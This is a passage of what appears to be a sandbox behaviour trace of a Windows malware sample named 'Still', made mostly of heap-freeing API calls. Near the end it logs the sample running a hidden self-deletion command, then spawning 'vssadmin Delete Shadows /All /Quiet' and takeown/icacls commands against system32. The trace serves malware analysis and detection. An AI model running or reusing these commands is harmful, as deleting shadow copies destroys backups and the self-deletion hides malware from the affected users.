pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0240.857] Sleep (dwMilliseconds=0x3e8) [0241.934] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0241.935] DeleteService (hService=0x849538) returned 1 [0242.010] DeleteService (hService=0x849538) returned 0 [0242.010] CloseServiceHandle (hSCObject=0x849538) returned 1 [0242.011] CloseServiceHandle (hSCObject=0x849588) returned 1 [0242.013] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x84a0d8 | out: hHeap=0x820000) returned 1 [0242.013] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x8497f8 | out: hHeap=0x820000) returned 1 [0242.013] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x849eb0 | out: hHeap=0x820000) returned 1 [0242.014] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x82b6e8 | out: hHeap=0x820000) returned 1 [0242.014] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x82b448 | out: hHeap=0x820000) returned 1 [0242.014] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x82b7e8 | out: hHeap=0x820000) returned 1 [0242.014] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x8488a8 | out: hHeap=0x820000) returned 1 [0242.014] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848888 | out: hHeap=0x820000) returned 1 [0242.014] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848a48 | out: hHeap=0x820000) returned 1 [0242.014] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x8489e8 | out: hHeap=0x820000) returned 1 [0242.014] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x8489c8 | out: hHeap=0x820000) returned 1 [0242.014] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848c88 | out: hHeap=0x820000) returned 1 [0242.014] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848d28 | out: hHeap=0x820000) returned 1 [0242.014] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x82b828 | out: hHeap=0x820000) returned 1 [0242.014] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x82b488 | out: hHeap=0x820000) returned 1 [0242.014] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x82b628 | out: hHeap=0x820000) returned 1 [0242.014] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x82b608 | out: hHeap=0x820000) returned 1 [0242.014] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x82b468 | out: hHeap=0x820000) returned 1 [0242.014] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x82b508 | out: hHeap=0x820000) returned 1 [0242.014] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x82b588 | out: hHeap=0x820000) returned 1 [0242.014] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x82b5c8 | out: hHeap=0x820000) returned 1 [0242.014] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848828 | out: hHeap=0x820000) returned 1 [0242.014] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848a88 | out: hHeap=0x820000) returned 1 [0242.014] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848a08 | out: hHeap=0x820000) returned 1 [0242.014] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848868 | out: hHeap=0x820000) returned 1 [0242.014] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x8488c8 | out: hHeap=0x820000) returned 1 [0242.014] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x8489a8 | out: hHeap=0x820000) returned 1 [0242.014] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x8486c8 | out: hHeap=0x820000) returned 1 [0242.014] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848e48 | out: hHeap=0x820000) returned 1 [0242.014] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848ba8 | out: hHeap=0x820000) returned 1 [0242.014] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848d48 | out: hHeap=0x820000) returned 1 [0242.014] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848c48 | out: hHeap=0x820000) returned 1 [0242.014] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848ac8 | out: hHeap=0x820000) returned 1 [0242.014] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848d68 | out: hHeap=0x820000) returned 1 [0242.014] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848cc8 | out: hHeap=0x820000) returned 1 [0242.015] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848dc8 | out: hHeap=0x820000) returned 1 [0242.015] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848b48 | out: hHeap=0x820000) returned 1 [0242.015] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848d88 | out: hHeap=0x820000) returned 1 [0242.015] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848b28 | out: hHeap=0x820000) returned 1 [0242.015] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x82b6a8 | out: hHeap=0x820000) returned 1 [0242.015] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x82b708 | out: hHeap=0x820000) returned 1 [0242.015] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x82b788 | out: hHeap=0x820000) returned 1 [0242.015] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x82b548 | out: hHeap=0x820000) returned 1 [0242.015] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x82b5e8 | out: hHeap=0x820000) returned 1 [0242.015] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848808 | out: hHeap=0x820000) returned 1 [0242.015] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848848 | out: hHeap=0x820000) returned 1 [0242.015] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848928 | out: hHeap=0x820000) returned 1 [0242.015] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848948 | out: hHeap=0x820000) returned 1 [0242.015] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x8487a8 | out: hHeap=0x820000) returned 1 [0242.015] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848968 | out: hHeap=0x820000) returned 1 [0242.015] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848aa8 | out: hHeap=0x820000) returned 1 [0242.015] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848a68 | out: hHeap=0x820000) returned 1 [0242.015] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x8486e8 | out: hHeap=0x820000) returned 1 [0242.015] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848708 | out: hHeap=0x820000) returned 1 [0242.015] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848788 | out: hHeap=0x820000) returned 1 [0242.015] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848768 | out: hHeap=0x820000) returned 1 [0242.015] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848b08 | out: hHeap=0x820000) returned 1 [0242.015] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848bc8 | out: hHeap=0x820000) returned 1 [0242.015] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848d08 | out: hHeap=0x820000) returned 1 [0242.015] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848c28 | out: hHeap=0x820000) returned 1 [0242.015] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848c08 | out: hHeap=0x820000) returned 1 [0242.015] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848c68 | out: hHeap=0x820000) returned 1 [0242.015] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848ce8 | out: hHeap=0x820000) returned 1 [0242.015] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848da8 | out: hHeap=0x820000) returned 1 [0242.015] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848ca8 | out: hHeap=0x820000) returned 1 [0242.015] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848de8 | out: hHeap=0x820000) returned 1 [0242.015] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848e08 | out: hHeap=0x820000) returned 1 [0242.015] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x82b5a8 | out: hHeap=0x820000) returned 1 [0242.015] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x82b668 | out: hHeap=0x820000) returned 1 [0242.015] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x82b528 | out: hHeap=0x820000) returned 1 [0242.016] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x82b7c8 | out: hHeap=0x820000) returned 1 [0242.016] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x82b4a8 | out: hHeap=0x820000) returned 1 [0242.016] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x82b4e8 | out: hHeap=0x820000) returned 1 [0242.016] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848908 | out: hHeap=0x820000) returned 1 [0242.016] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848728 | out: hHeap=0x820000) returned 1 [0242.016] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848988 | out: hHeap=0x820000) returned 1 [0242.016] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x8487e8 | out: hHeap=0x820000) returned 1 [0242.016] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848a28 | out: hHeap=0x820000) returned 1 [0242.016] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x8488e8 | out: hHeap=0x820000) returned 1 [0242.016] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x8487c8 | out: hHeap=0x820000) returned 1 [0242.016] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848748 | out: hHeap=0x820000) returned 1 [0242.016] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848e68 | out: hHeap=0x820000) returned 1 [0242.016] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848e28 | out: hHeap=0x820000) returned 1 [0242.016] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848be8 | out: hHeap=0x820000) returned 1 [0242.016] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848b68 | out: hHeap=0x820000) returned 1 [0242.016] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x82bd88 | out: hHeap=0x820000) returned 1 [0242.016] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x82be50 | out: hHeap=0x820000) returned 1 [0242.016] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x82c0d0 | out: hHeap=0x820000) returned 1 [0242.016] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x82bdb0 | out: hHeap=0x820000) returned 1 [0242.016] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x82c440 | out: hHeap=0x820000) returned 1 [0242.016] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x82c300 | out: hHeap=0x820000) returned 1 [0242.016] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x82c260 | out: hHeap=0x820000) returned 1 [0242.016] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x82c288 | out: hHeap=0x820000) returned 1 [0242.016] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x82c3c8 | out: hHeap=0x820000) returned 1 [0242.016] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848f20 | out: hHeap=0x820000) returned 1 [0242.016] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x849268 | out: hHeap=0x820000) returned 1 [0242.016] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x8490d8 | out: hHeap=0x820000) returned 1 [0242.016] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x849010 | out: hHeap=0x820000) returned 1 [0242.016] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848ef8 | out: hHeap=0x820000) returned 1 [0242.016] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848fe8 | out: hHeap=0x820000) returned 1 [0242.016] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x8492b8 | out: hHeap=0x820000) returned 1 [0242.016] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x849150 | out: hHeap=0x820000) returned 1 [0242.016] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x8492e0 | out: hHeap=0x820000) returned 1 [0242.016] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x8494c0 | out: hHeap=0x820000) returned 1 [0242.016] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x82bf90 | out: hHeap=0x820000) returned 1 [0242.017] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x82bd38 | out: hHeap=0x820000) returned 1 [0242.017] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x82c3f0 | out: hHeap=0x820000) returned 1 [0242.017] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x82c418 | out: hHeap=0x820000) returned 1 [0242.017] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x82c2b0 | out: hHeap=0x820000) returned 1 [0242.017] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x82c328 | out: hHeap=0x820000) returned 1 [0242.017] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x849100 | out: hHeap=0x820000) returned 1 [0242.017] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x849330 | out: hHeap=0x820000) returned 1 [0242.017] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x849308 | out: hHeap=0x820000) returned 1 [0242.017] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848f70 | out: hHeap=0x820000) returned 1 [0242.017] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x8491f0 | out: hHeap=0x820000) returned 1 [0242.017] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x8491a0 | out: hHeap=0x820000) returned 1 [0242.017] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x849128 | out: hHeap=0x820000) returned 1 [0242.017] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848f98 | out: hHeap=0x820000) returned 1 [0242.017] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x849218 | out: hHeap=0x820000) returned 1 [0242.017] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x849038 | out: hHeap=0x820000) returned 1 [0242.017] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x849290 | out: hHeap=0x820000) returned 1 [0242.017] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x8493a8 | out: hHeap=0x820000) returned 1 [0242.017] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848ed0 | out: hHeap=0x820000) returned 1 [0242.017] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x849560 | out: hHeap=0x820000) returned 1 [0242.017] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x82c0a8 | out: hHeap=0x820000) returned 1 [0242.017] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x82bdd8 | out: hHeap=0x820000) returned 1 [0242.017] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x82c3a0 | out: hHeap=0x820000) returned 1 [0242.017] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x82c490 | out: hHeap=0x820000) returned 1 [0242.017] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x82c468 | out: hHeap=0x820000) returned 1 [0242.017] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x82c378 | out: hHeap=0x820000) returned 1 [0242.017] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x82c238 | out: hHeap=0x820000) returned 1 [0242.017] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x849240 | out: hHeap=0x820000) returned 1 [0242.017] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x849380 | out: hHeap=0x820000) returned 1 [0242.017] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848fc0 | out: hHeap=0x820000) returned 1 [0242.017] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848f48 | out: hHeap=0x820000) returned 1 [0242.017] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x8490b0 | out: hHeap=0x820000) returned 1 [0242.017] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x849178 | out: hHeap=0x820000) returned 1 [0242.017] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x8493d0 | out: hHeap=0x820000) returned 1 [0242.018] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x849420 | out: hHeap=0x820000) returned 1 [0242.018] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x82c030 | out: hHeap=0x820000) returned 1 [0242.018] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x82c210 | out: hHeap=0x820000) returned 1 [0242.018] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x82c2d8 | out: hHeap=0x820000) returned 1 [0242.018] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x82c350 | out: hHeap=0x820000) returned 1 [0242.018] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x82c1e8 | out: hHeap=0x820000) returned 1 [0242.018] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x8491c8 | out: hHeap=0x820000) returned 1 [0242.018] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x849358 | out: hHeap=0x820000) returned 1 [0242.018] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x849088 | out: hHeap=0x820000) returned 1 [0242.018] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x849060 | out: hHeap=0x820000) returned 1 [0242.018] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x8493f8 | out: hHeap=0x820000) returned 1 [0242.018] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x849650 | out: hHeap=0x820000) returned 1 [0242.018] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x849448 | out: hHeap=0x820000) returned 1 [0242.018] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x838b90 | out: hHeap=0x820000) returned 1 [0242.018] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x838d10 | out: hHeap=0x820000) returned 1 [0242.018] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x838dd0 | out: hHeap=0x820000) returned 1 [0242.018] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x838e00 | out: hHeap=0x820000) returned 1 [0242.018] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x838e30 | out: hHeap=0x820000) returned 1 [0242.018] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x849a98 | out: hHeap=0x820000) returned 1 [0242.018] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x849c78 | out: hHeap=0x820000) returned 1 [0242.018] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x8498b8 | out: hHeap=0x820000) returned 1 [0242.018] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x849858 | out: hHeap=0x820000) returned 1 [0242.018] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x838ad0 | out: hHeap=0x820000) returned 1 [0242.018] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x838d70 | out: hHeap=0x820000) returned 1 [0242.018] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x8497c8 | out: hHeap=0x820000) returned 1 [0242.018] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x849b88 | out: hHeap=0x820000) returned 1 [0242.018] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x838bc0 | out: hHeap=0x820000) returned 1 [0242.018] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x838ce0 | out: hHeap=0x820000) returned 1 [0242.018] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x838da0 | out: hHeap=0x820000) returned 1 [0242.019] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x849768 | out: hHeap=0x820000) returned 1 [0242.019] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x83a4a0 | out: hHeap=0x820000) returned 1 [0242.019] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Still:bin") returned 41 [0242.019] lstrcmpW (lpString1=":bin", lpString2=":bin") returned 0 [0242.019] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0xfe) returned 0x83f7b0 [0242.019] _snwprintf (in: _Dest=0x83f7b0, _Count=0x7f, _Format="cmd /c choice /t %u /d y & attrib -h \"%s\" & del \"%s\"" | out: _Dest="cmd /c choice /t 10 /d y & attrib -h \"C:\\Users\\FD1HVy\\AppData\\Roaming\\Still\" & del \"C:\\Users\\FD1HVy\\AppData\\Roaming\\Still\"") returned 122 [0242.020] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="cmd /c choice /t 10 /d y & attrib -h \"C:\\Users\\FD1HVy\\AppData\\Roaming\\Still\" & del \"C:\\Users\\FD1HVy\\AppData\\Roaming\\Still\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x19fef0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19ff34 | out: lpCommandLine="cmd /c choice /t 10 /d y & attrib -h \"C:\\Users\\FD1HVy\\AppData\\Roaming\\Still\" & del \"C:\\Users\\FD1HVy\\AppData\\Roaming\\Still\"", lpProcessInformation=0x19ff34*(hProcess=0x28c, hThread=0x288, dwProcessId=0x13d8, dwThreadId=0x13d4)) returned 1 [0243.687] CloseHandle (hObject=0x288) returned 1 [0243.687] CloseHandle (hObject=0x28c) returned 1 [0243.687] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x83f7b0 | out: hHeap=0x820000) returned 1 [0243.687] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x0) returned 0x401af6 [0243.687] WaitForSingleObject (hHandle=0x254, dwMilliseconds=0x0) returned 0x102 [0243.687] CloseHandle (hObject=0x25c) returned 1 [0243.688] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Still.dmp" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\still.dmp")) returned 1 [0243.689] ExitProcess (uExitCode=0x0) Thread: id = 4 os_tid = 0x1318 Process: id = "3" image_name = "vssadmin.exe" filename = "c:\\windows\\system32\\vssadmin.exe" page_root = "0x1076000" os_pid = "0xf8c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x704" cmd_line = "C:\\WINDOWS\\system32\\vssadmin.exe Delete Shadows /All /Quiet" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 5 os_tid = 0xfa0 Thread: id = 9 os_tid = 0x380 Thread: id = 10 os_tid = 0x980 Thread: id = 11 os_tid = 0xc20 Thread: id = 12 os_tid = 0xd78 Process: id = "4" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x1a183000" os_pid = "0xfc4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0xf8c" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 6 os_tid = 0xfe0 Thread: id = 7 os_tid = 0xff4 Thread: id = 8 os_tid = 0xcd8 Process: id = "5" image_name = "takeown.exe" filename = "c:\\windows\\syswow64\\takeown.exe" page_root = "0x22fd1000" os_pid = "0xd80" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x704" cmd_line = "C:\\WINDOWS\\system32\\takeown.exe /F C:\\WINDOWS\\system32\\Still.exe" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 13 os_tid = 0x798 Thread: id = 17 os_tid = 0xdd0 Process: id = "6" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x14838000" os_pid = "0xaac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0xd80" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 14 os_tid = 0x2c0 Thread: id = 15 os_tid = 0xc2c Thread: id = 16 os_tid = 0xdbc Process: id = "7" image_name = "icacls.exe" filename = "c:\\windows\\syswow64\\icacls.exe" page_root = "0x976e000" os_pid = "0x868" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x704" cmd_line = "C:\\WINDOWS\\system32\\icacls.exe C:\\WINDOWS\\system32\\Still.exe /reset" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" 